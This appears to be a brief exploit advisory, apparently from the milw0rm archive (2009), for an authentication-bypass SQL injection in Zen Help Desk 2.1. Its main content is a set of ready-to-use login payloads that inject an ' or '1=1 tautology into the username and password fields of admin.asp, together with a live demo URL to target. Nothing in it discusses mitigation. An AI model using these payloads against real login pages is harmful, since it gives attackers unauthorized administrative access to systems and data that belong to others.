--------------------------------------------------------------- ------------------------------------------------------------ Zen Help Desk Version 2.1 (Auth Bypass) SQL Injection Vulnerability --------------------------------------------------------------- Founder : TiGeR-Dz Home:http://www.zenhelpdesk.com/ Script:Zen Help Desk Version 2.1 --------------------------------------------------------------- --------------------------------------------------------------- Exploit: ------- http://www.site.com/admin.asp username:[admin_name]' or '1=1 password: No Thing or username:' or '1=1 password:' or '1=1 -------------------------------------- Dem0 --- http://helpdesk-demo.com/admin.asp -------------------------------------- Greeting To ALL My Friends (Dz) ---------------------------------------------------------------- # milw0rm.com [2009-05-29]